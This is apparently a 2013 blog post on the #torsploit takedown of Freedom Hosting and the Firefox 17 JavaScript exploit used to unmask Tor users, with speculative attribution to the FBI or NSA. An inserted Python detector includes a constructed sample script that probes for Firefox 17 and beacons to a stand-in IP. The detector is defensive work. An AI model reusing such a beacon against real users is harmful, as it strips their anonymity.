
Government Software Suspected of Compromising Tor Anonymity in Porn Hosting Takedown


On Sunday night, a number of “hidden service addresses” began disappearing from the Tor network, now being tagged as #torsploit.

Many of these addresses were hosted by a company called Freedom Hosting. Concurrently, the Irish Independent reported the FBI was seeking the extradition of Eric Eoin Marques, founder of Freedom Hosting, alleging he was “the largest facilitator of child porn on the planet.”

In response, Tor blogger phobos published a post indicating that Freedom Hosting was in no way associated with the Tor project, but rather ran a “hidden service” which was reachable only through the Tor network:

Anyone can run hidden services, and many do. We use them internally at The Tor Project to offer our developers anonymous access to services such as SSH, IRC, HTTP, and our bug tracker. Other organizations run hidden services to protect dissidents, activists, and protect the anonymity of users trying to find help for suicide prevention, domestic violence, and abuse-recovery. Whistleblowers and journalists use hidden services to exchange information in a secure and anonymous way and publish critical information in a way that is not easily traced back to them. The New Yorker’s Strongbox is one public example.

And therein lies the rub.  While hidden services are a critical part of many systems used to protect the legitimate anonymous activity of those whose lives depend on it, they are also naturally attractive to those seeking to exploit them for criminal activity.

The software used on Freedom Hosting servers was likely breached in such a way that it injected a piece of JavaScript into the web pages delivered to users, which was then used to load malicious HTML code to infect the user’s computer.

The Tor post also suggests that this may have been possible due to a bug in the Firefox 17 browser. The Tor Browser is based on Firefox.

Apparently the code checks to see if a user is using Firefox 17. If so, the user is redirected to a site outside the Tor network that can identify the true address of those visiting it.
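The two-step behaviour just described (a user-agent check for Firefox 17, then a request to a host outside the Tor network) is something a hidden-service operator can scan served pages for. The Python heuristic below is an added example written for this post, not code from the incident or from any of the sources cited; the sample HTML, the script inside it and the IP address it contacts are all constructed.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: one benign inline script, one script shaped like the
# injection described in the post (probe for Firefox 17, then contact a clearnet
# host), and one external script with no inline body. Addresses are made up.
SAMPLE_HTML = """<html><body>
<script>document.title = "welcome";</script>
<script>
if (navigator.userAgent.indexOf("Firefox/17") !== -1) {
  var i = new Image(); i.src = "http://203.0.113.5/cgi-bin/collect";
}
</script>
<script src="/static/app.js"></script>
</body></html>"""

# A user-agent check that singles out Firefox 17 (re.S: the check may span lines).
UA_PROBE = re.compile(r"navigator\.userAgent.*Firefox/17", re.S)
# Any http(s) URL; the host is filtered below so .onion services are ignored.
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")


class ScriptCollector(HTMLParser):
    """Collect the body of every inline <script> element on a page."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def clearnet_hosts(script):
    """Hosts referenced by the script that are not Tor hidden services."""
    return sorted({h for h in URL_HOST.findall(script) if not h.endswith(".onion")})


def flag_suspicious_scripts(html):
    """Inline scripts that both probe for Firefox 17 and reach outside Tor."""
    collector = ScriptCollector()
    collector.feed(html)
    hits = []
    for body in collector.scripts:
        hosts = clearnet_hosts(body)
        if UA_PROBE.search(body) and hosts:
            hits.append({"hosts": hosts, "snippet": body.strip()[:60]})
    return hits
```

Run against `SAMPLE_HTML` it reports exactly one script with the host `203.0.113.5`; a script that checks for Firefox 17 but only talks to a `.onion` address is left alone, so the heuristic keys on the combination rather than on either step by itself.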

Security expert Brian Krebs reports that this vulnerability was fixed in Firefox 22 and Firefox ESR 17.0.7, according to Mozilla.

“People who are on the latest supported version of Firefox are not at risk,” says Krebs.

Reverse engineer Vlad Tsyrklevich has posted an annotation and brief analysis of the payload used by the Tor Browser Bundle exploit.

“Because this payload does not download or execute any secondary backdoor or commands it’s very likely that this is being operated by an LEA [law enforcement agency] and not by blackhats,” he concludes.

Wired notes that the code is “likely the first sample captured in the wild of the FBI’s ‘computer and internet protocol address verifier,’ or CIPAV,” software that the FBI has been using since 2002 against “hackers, online sexual predators, extortionists and others, primarily to identify suspects who are disguising their location using proxy servers or anonymity services, like Tor.”

Because the software has been used sparingly in the past, a sample has never been available for analysis and addition to anti-virus databases.

“Now that there’s a sample of the code,” notes Wired, “will anti-virus companies start detecting it?”

Freedom Hosting has, in the past, been targeted by members of Anonymous, who launched denial of service attacks to prevent child pornographers from operating on the Tor network.

Nobody can argue with the FBI’s legitimate pursuit of removing child pornographers from the internet.  However, in a country that equates whistleblowers with terrorists and charges them with espionage and aiding the enemy, there is also serious concern in the tech community today that the anonymity provided by the Tor network can now be compromised in ways that jeopardize secure legitimate communications.

Update 1:36 PM EST: According to Baneki Privacy Labs (h/t DSWright), the address that the malware is redirecting traffic to is owned by defense contractor SAIC and allocated to the NSA, not the FBI.

Cryptocloud speculates that this could be part of the NSA’s PRISM program:

What is an NSA IP address doing as a command & control contact for javascript malware being deployed in the #torsploit attack? That remains to be seen… but we already know that PRISM data has been “jumping the wall” and leaking into other law enforcement hands. Is this an example of further abuse of PRISM’s “national security only” dataset? That appears the most likely explanation, at this point in time.

Color me skeptical, but why would the embattled and disgraced agency just “happen” to leave its fingerprints on a child-porn case just now that could be used to publicly justify both the PRISM program’s existence and secrecy?

Update 2:25 PM EST: Natasha Lennard at Salon says “Those who had thought using Tor exempted them from government dragnets may, in light of #torsploit, think again.”

Note: This post originally indicated the #torsploit software may have originated with the FBI.  It has been edited to reflect that the list of suspects has expanded.

Update 2:31 PM EST: Sean Gallagher at Ars Technica (h/t yellowsnapdragon):

The use of a hard-coded IP address traceable back to the NSA is either a strange and epic screw-up on the part of someone associated with the agency (possibly a contractor at SAIC) or an intentional calling card as some analyzing the attack have suggested. One poster on Cryptocloud’s discussion board wrote, “It’s psyops—a fear campaign… They want to scare folks off Tor, scare folks off all privacy services.”

“Scaring people off” Tor is also a distinct possibility. There have been calls from many quarters to expand the Tor network ever since the Snowden leak, which — even if not completely secure — makes it a whole lot harder for the NSA to do its thing.


Jane Hamsher


Jane is the founder of Firedoglake.com. Her work has also appeared on the Huffington Post, Alternet and The American Prospect. She’s the author of the best-selling book Killer Instinct and has produced such films as Natural Born Killers and Permanent Midnight. She lives in Washington DC.